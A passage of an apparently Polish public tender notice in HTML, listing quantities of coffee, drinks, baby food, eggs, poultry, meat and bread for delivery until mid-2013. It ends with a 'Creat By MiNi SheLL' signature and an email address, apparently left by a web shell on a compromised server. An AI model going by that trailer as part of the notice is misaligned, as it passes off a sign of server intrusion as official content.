Kawa parzona 250g np.. Jakobs Kronung	kg	10
Kawa parzona a 100g np..  Jacobs	kg	15
Kawa parzona a 100g np.. Maxwell	kg	10
Kawa parzona a 250g np.. Maxwell	szt	10
Kawa rozpuszczalna a 100 g np.. Cranata Gold 	szt	20
Kawa rozpuszczalna  3 w 1 (saszetka) np.. Nescafe	szt	50
Kawa rozpuszczalna  50g np.. Nescafe	szt	30
Kawa rozpuszczalna  a 100g np.. Nescafe	szt	30
Kawa rozpuszczalna a 100g np.. Jakobs Aromat 	szt	20
Kawa rozpuszczalna  a 200g np.. Maxwell	szt	20
Kawa rozpuszczalna  a 200g np.. Nescafe	szt	20
Kawa rozpuszczalna a 200g np.. Jakobs Aromat 	szt	20
Kawa rozpuszczalna  a 50g np.. Maxwell	szt	20
Kawa rozpuszczalna a 100g np.. Jakobs Kronung 	szt	20
Kawa rozpuszczalna a 100g np.. Tchibo Familly 	szt	20
Kawa rozpuszczalna a 200 g np.. Cranat Gold 	szt	20
Kawa rozpuszczalna a 200 g np.. Tchibo Familly	szt	20
Kawa rozpuszczalna typu Nescafe Creme 100 g	szt	15
Kawa rozpuszczalna typu Nescafe Creme 200 g	szt	10
Kawa zbożowa 0,5 kg	szt	300
Krakersy a 70g	szt	50
Kwa rozpuszczalna 200g np.. Jakobs Kronung	szt	20
Paluszki a 135g	szt	100
Paluszki  a 70g a Beskidzkie	szt	50
Rodzynki w czekoladzie 80g 	szt	30
Snaki a 28g	szt	50
Suchary a 300g	szt	20
Wafle  a 180g np..Kinder	szt	50
Wafle  a 22g np..WW	szt	50
Wafle  a 36g np.. Princessa	szt	120
Wafle  a 40g np.. Prinsesa	szt	50
Wafle  a 45g np.. WW	szt	50
Wafle a 20g np.. Prince Polo	szt	100
Wafle a 28g np.. Prince Polo 	szt	50
Wafle a 40g np. Prince Polo 	szt	100
Wafle a 50g np.. Horalky różne smaki 	szt	20
Wafle andrutowe a 110g	szt	30
Wafle andrutowe a 180g np.. Familijne 	szt	50
Wafle andrutowe a 28g np.. Grześki	szt	100
Wafle czekoladowe a 20g np.. Elitesse	szt	1200
Wafle czekoladowe a 40g np.. Elitesse	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa napoi wyszczególnionych w pakiecie nr 3:
Napój 1,5l np.. Go-Go Cola	szt	50
Napój 1,5l np.. Go-Go Lemon 	szt	50
Napój  0,5l np.. Go-Go Orange 	szt	50
Napój zielony banan 1l 	szt	50
Napój 1,5l np.. Go-Go Orange 	szt	80
Sok a 0,33l np.. Kubuś 	szt	250
Sok a 0,75l np.. Kubuś 	szt	150
Napój  0,2l np. cymes	szt	800
Napój  250ml np.. Frugo	szt	100
Napój  0,5l np.. Hop	szt	200
Napój 1,5l np. Hop	szt	100
Napój jabłkowo-brzoskwiniowy 0,2l	szt	100
Napój jabłkowy 0,2l	szt	60
Napój pomarańczowo-brzoskwiniowy 0,2l	szt	60
Napój pomarańczowy 0,2l	szt	60
Napój winogronowy 0,2l	szt	60
 Napój 500ml np.. Nestle Pech różne smaki 	szt	150
Napój 0,5l l np.. Lipton różne smaki	szt	350
Nektar czarna porzeczka 0,3l 	szt	150
Napój 05,l np.. Pepsi Cola 	szt	500
Napój 0,33l np.. Pepsi Cola	szt	50
Napój 1l np.. Pepsi Cola 1l	szt	300
Sok 0,33l np.. Pysio 	szt	100
Sok 0,75l np.. Pysio 0,75l	szt	80
Sok do wody 0,5l, różne smaki	szt	250
Sok pomidorowy 1l np.. Tymbark 	szt	40
Sok czarna porzeczka a 1l	szt	100
Sok czarna porzeczka a0,2l	szt	50
Sok gejpfrutowy a 1l	szt	50
Sok jabłkowy 0,2l	szt	50
Sok jabłkowy a 1l	szt	100
Sok multiwita a 1l	szt	50
Sok pomarańczowy 0,2l	szt	50
Sok pomarańczowy a 1l	szt	100
Sok wieloowocowy a 1l	szt	100
Sok jabłko-pomarańcza 033l np. Tymbark 	szt	50
Sok  brzoskwiniowo-pomarańczowy 0,33l np.. Tymbark	szt	50
Sok czarna porzeczka 0,33l np.. Tymbark 	szt	50
Sok  jabłko-brzoskwinia 0,33l np.. Tymbark	szt	50
Sok jabłko-mięta 0,33l np.. Tymbark 	szt	50
Sok  jabłko-wiśnia 0,33l np.. Tymbark	szt	50
Napój  0,5l np.. Tymbark Pet	szt	200
Woda 1,5l np.. Veroni, Nałęczowianka, Jurajska, Cisowianka  smakowe 	szt	250
Woda 1,5l np.. Veroni, Nałęczowianka, Jurajska, Cisowianka  	szt	300
Woda 0,5l np.. Nałęczowinka , Veroni, Jurajska smakowa  	szt	300
Woda mineralna a 0,33l gazowana	szt	50
Woda mineralna a 0,33l niegazowana	szt	50
Woda mineralna a 0,5l np.. Muszynianka	szt	50
Woda mineralna a 1,5l niegazowana  np.. Muszynianka	szt	50
Woda mineralna a 1,5l  gazowana np..Cisowianka 	szt	70
Woda mineralna a 1,5l niegazowana np. Cisowianka, Nałęczowianka	szt	300
Woda mineralna a 1,5l niegazowana np..( Mama i Ja) dopuszczona do stosowania przez Instytut Matki i Dziecka	szt	700
Woda mineralna  0,5 l np.. Arctic, Nałęczowianka, 	szt	500
Woda mineralna  1,5 l np.. Arctic, Nałęczowianka	szt	300
Woda mineralna 0,5l np.. Niegazowana np.. Cisowianka	szt	200
Woda mineralna 0,5l np.. gazowana np.. Cisowianka	szt	200
Woda 0,5l np.. Żywiec Zdrój 	szt	100
Napój np.. Tymbark aseptic 0,5 l	szt	350
Oranżada różne smaki 1,5 l	szt	50
Sok np.. Cymes 0,2 l	szt	200
Woda 1,5l   smakowe	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.09-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żwnościowych dla dzieci i niemowląt:
 Mieszanka mleczna z ryżem od 4 m-ca a 350g np.. Bebiko 2R	szt	100
 Mleko od 4 m-ca a 350g np.. Bebiko 2	szt	100
Mleko a 350 g od urodzenia np..Bebiko HA 1 	szt	50
Mleko a 350 g od 4 m-ca np..Bebiko HA 2 	szt	50
 Mleko następne od urodzenia a 350g np..Bebiko I	szt	100
 Mleko a 400g od urodzenia np..Bebilon HA 1	szt	50
 Mleko a 400g od 4 m-ca np.Bebilon HA 2	szt	50
Mleko od urodzenia 400g np..Bebilon I 	szt	100
Mleko od 4 m-ca a 400g np..Bebilon II	szt	100
Mleko modyfikowane dla niemowląt a 350g np.. Gerber1, Gerber2 	szt	20
Deser po 4 m-cu a 125g -130g np..Złociste jabłko 	szt	100
Deser jabłko ze słodką marchewką po 4 m-cu a 125g-130g	szt	150
Deser jabłka z delikatnym bananem po 4 m-cu a 125g-130g	szt	100
Deser jabłka i słoneczna brzoskwinia po 4 m-cu a 125g-130g	szt	100
Deser jabłka i łagodna morela z winogronami a 125g -130gpo 6 m-cu	szt	100
Deser sałatka z owoców lata po 6 m-cu a 125g-130g	szt	100
Deser jabłko , winogrona z różanym puree 125g-130g	szt	100
Deser jabłko i łagodna dynia po 4 m-cu a 125g-130g	szt	100
Deser marchew, jabłko od 5 m-ca a 130g-140g	szt	100
Kaszka mleczno-ryżowa od 5 m-ca a 200g -230g np.. Nestle	szt	100
Kaszka mleczno-ryzowa z brzoskwiniami a 250g od 10 m-ca	szt	100
Kaszka mleczno-ryzowa z morelami a 230g-250g od 10 m-ca	szt	100
Kaszka mleczno-ryżowa od 5 m-ca a 200g-230g	szt	150
Kaszka ryżowa z marchewką 250 g po 4 m-cu np.. Nestle	szt	50
Kaszka ryzowa z bananem a 180g np.. Bobowita	szt	200
Kaszka ryzowa z jabłkami od 5 m-ca a 200g np.. nestle	szt	50
Kaszka ryżowa z malinami od 5 m-ca a 180-200g	szt	20
Kleik kukurydziany  po 4-m-ca 170-200g np.. Nestle	szt	30
Kaszka ryżowo- kukurydziana a 170 g 	szt	50
Kleik ryżowy a 170 g np..Nestle 	szt	150
Kaszka ryżowa z jabłkami a 170-180g	szt	100
Kaszka mleczno ryżowa banan 170-230g	szt	150
Kaszka ryżowa z bananami 170-180g	szt	150
Kleik kukurydziany  od 5 m-ca a 170-190g np.. Nestle	szt	100
Marchewka delikatna a 125g	szt	200
Mleko od urodzenia a 350g np.. NAN I 	szt	200
 Mleko powyżej 6-m-ca życia a 350 g Nan II	szt	200
Mleko powyżej 6-m-ca życia a 350g np.. Nan IIR	szt	150
 Mleko od urodzenia a 400g np..NAN HA 1	szt	50
Mleko  a 400g pd 4 m-np.. NAN HA 2	szt	50
Mleko od 6 m-ca a 350g np..Nan II 	szt	200
Mleko następne z dodatkiem ryżu  a 350g od 6 m-ca np..NAN 2R	szt	150
Mleko początkowe i następne  od 0-5 m-ca a 350g np..Nan I	szt	200
Sok jabłko, morela,marchew od 7 m-ca a 175 ml	szt	150
Sok morelowo-jabłkowy a 175 ml od 7 m-ca	szt	150
Sok marchew jabłko a 175ml od 4 m-ca	szt	150
Sok marchew, jabłko, dynia i winogrona od 5 miesiąca  a 175 ml  od 5 m-ca	szt	150
Sok pachnące latem owoce (jagodowy) a 175 ml od 5 m-ca	szt	100
Sok winogrona, dzika róża i słodka malina 175 ml	szt	100
Sok winogrona i aromatyczna dzika róża a 175 ml	szt	100
Sok Jabłkowo-marchewkowy od 4-m-ca 250ml	szt	100
Sok z winogron, dzikiej róży i malin a 175 ml od 5 m-ca	szt	100
Warzywa w łagodnej potrawce z królikiem po 5 m-cu a 125g	szt	100
Krem marchwiowy z jarzynami a 150 g	szt	50
Warzywa z aromatycznym indykiem po 5 m-cu a 125g	szt	100
Zupa jarzynowa z kurczakiem od 6 m-ca a 140g np.. Bobowita	szt	200
Zupka jarzynowa ze świeżych warzyw po 4 m-cu a 125g	szt	200
Zupka jarzynowa z kurczakiem po 5 m-cu a 125g	szt	200
Zupka jarzynowa z delikatnym królikiem po 5 m-cu a 125g	szt	150
Aromatyczny rosołek z kurczakiem, z ryżem po 6 m-cu a 190g	szt	150
Zupka pomidorowa z łagodnym kurczakiem i ryżem po 6 m-cu a 190g	szt	100
Zupa marchew z ryżem od 5 m-ca a 140g 	szt	200
Zupa delikatna marchewka 125 g po 4 miesiącu 	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.00-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa jaj:
Jajka klasa I a około 55g 	szt	85000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest drób:
Kurczaki	kg	6200
Ćwiartka z kurczaka	kg	4000
Filet z indyka	kg	10
Filet z kurczaka	kg	850
Kury mięsne świeże	kg	3000
Kury rosołowe swieże	kg	1500
Kury rosołowe mrożone	kg	500
Kury mięsne mrożone	kg	1000
Podudzie z kurczaka	kg	70
Skrzydełka z kurczaka	kg	100
Udziec z indyka	kg	20
Udziec z kurczaka	kg	60
Wątróbka drobiowa	kg	250
Żołądki z kurczaka	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są pieczarki  świeże	kg	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.12.60-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest mięso i wędliny określone w pakiecie nr 8:
Baleron drobiowy	kg	20
Baleron wieprzowy	kg	20
Boczek wędzony	kg	100
Filet z indyka	kg	100
Kabanos wieprzowy	kg	5
Kaszanka	kg	120
Kiełbasa zwyczajna	kg	200
Kiełbasa szynkowa wieprzowa	kg	80
Kiełbasa wiejska	kg	50
Kiełbasa żywiecka	kg	50
Mielonka drobiowa	kg	450
Mielonka wieprzowa	kg	400
Ogonówka	kg	10
Parówka drobiowa	kg	2800
Parówka cielęca	kg	50
Parówka wieprzowa	kg	50
Pasztet pieczony	kg	40
Pasztetowa	kg	530
Salceson drobiowy	kg	150
Salceson wieprzowy	kg	350
Serdelki drobiowe	kg	50
Szynka drobiowa parzona	kg	1850
Szynka drobiowa prasowana np.. Dionizego	kg	300
Szynka gotowana wieprzowa	kg	25
Szynka wiejska	kg	20
Boczek surowy	kg	20
Cielęcina z kością	kg	20
Flaki wołowe mrożone (czyszczone i gotowane)	kg	120
Golonka wieprzowa	kg	50
Karczek wieprzowy b/k	kg	300
Karczek wieprzowy z/k	kg	50
Kotlet schabowy b/k	kg	750
Kotlet schabowy z kością 	kg	200
Pieczeń wieprzowa b/k	kg	200
Pieczeń wołowa I b/k	kg	150
Pieczeń wołowa II b/k	kg	200
Słonina	kg	600
Smalec	kg	300
Wątroba wieprzowa	kg	100
Wieprzowina I	kg	2500
Wieprzowina pieczeń b/k	kg	150
Wołowina antrykot	kg	150
Wołowina gulaszowe	kg	500
Wołowina rozbrat	kg	150
Wołowina z kością Kl I	kg	2500
Żeberka wieprzowe	kg	50
Łopatka wieprzowa b/k	kg	600
Łopatka wieprzowa z/k	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-0, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem amówienia jest dostawa pieczwya okreslonego w pakiecie nr 9:
Bułka tarta	kg	950
Bułki 100 g	szt	60 000
Bułki 50g	szt	26000
Bułki kajzerki 50g	szt	3800
Bułka grahamka 100g	szt 	1300
Chałka 500g	szt	30
Chleb a 1 kg	szt	21000
Chleb bez soli 500g	szt	1200
Chleb bezglutenowy 500g	szt	100
Chleb graham  500g	szt	6000
Drożdże	kg	65
Drożdżówki (różne smaki)	szt	800
Pączki różne smaki)	szt	1400
Rogale (paluchy) 80g	szt	1100
Sezam	kg	25
Strucla z makiem 500g	szt	50
Bagietka 500g	szt	50
Weki 500g	szt	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com